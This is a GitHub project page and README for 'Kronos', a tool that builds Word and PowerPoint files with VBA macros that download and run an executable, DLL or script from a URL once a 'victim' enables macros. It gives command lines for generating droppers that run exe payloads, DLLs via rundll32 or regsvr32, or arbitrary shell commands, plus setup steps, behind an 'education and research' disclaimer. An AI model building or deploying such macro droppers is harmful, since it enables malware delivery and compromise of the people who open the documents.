https://github.com/elmerikh/kronos
MS Word , PPT Macros VBA payload Dropper tool ⏳
https://github.com/elmerikh/kronos
cybersecurity macros--injector macros-payload ms-exploit payload-injector pe-injector powershell-payload powershell-script ppt-exploit redteam-tools redteaming vba-exploit vba-macros vba-word word-exploit word-exploit-builder word-macros-injector
Last synced: 3 days ago
JSON representation
MS Word , PPT Macros VBA payload Dropper tool ⏳
- Host: GitHub
- URL: https://github.com/elmerikh/kronos
- Owner: ELMERIKH
- License: gpl-3.0
- Created: 2024-01-01T18:09:02.000Z (over 1 year ago)
- Default Branch: master
- Last Pushed: 2024-02-22T13:38:07.000Z (over 1 year ago)
- Last Synced: 2025-06-22T19:08:52.157Z (3 days ago)
- Topics: cybersecurity, macros--injector, macros-payload, ms-exploit, payload-injector, pe-injector, powershell-payload, powershell-script, ppt-exploit, redteam-tools, redteaming, vba-exploit, vba-macros, vba-word, word-exploit, word-exploit-builder, word-macros-injector
- Language: Python
- Homepage:
- Size: 46.9 KB
- Stars: 7
- Watchers: 1
- Forks: 1
- Open Issues: 0
-
Metadata Files:
- Readme: readme.md
- License: LICENSE.txt
Awesome Lists containing this project
README
](<2023-12-24 10_34_53-Photos.png>)
Greetings
--------------------------Kronos is a doc and ppt exploitation tool to deliver Payloads via Vba macros by downloding the PE from a URL
it generates a docm or pptm , if macros disabled by default ,victim needs to enable macros
for an exe use :
python kronos.py -Url 'https://your.link' --word_file 'if you have a docx file' -PE 'name.exe'
for a dll use :
python kronos.py -Url 'https://your.link' --word_file 'if you have a docx file' -PE " {rundll32 or regsvr32} {name.dll} ,{function if needed} "
you can also run a ps1 or bat file or any shell cmd
https://github.com/ELMERIKH/Kronos/assets/96123439/e1efc4e7-5b63-4fdc-8076-400eae8b6f85
setup:
------------git clone https://github.com/ELMERIKH/Kronos
pip install -r requirements.txt
python3 Kronos.py
DISCLAIMER :
----------------------------------ME The author takes NO responsibility and/or liability for how you choose to use any of the tools/source code/any files provided. ME The author and anyone affiliated with will not be liable for any losses and/or damages in connection with use of Kronos. By using Kronos or any files included, you understand that you are AGREEING TO USE AT YOUR OWN RISK. Once again Kronos is for EDUCATION and/or RESEARCH purposes ONLY.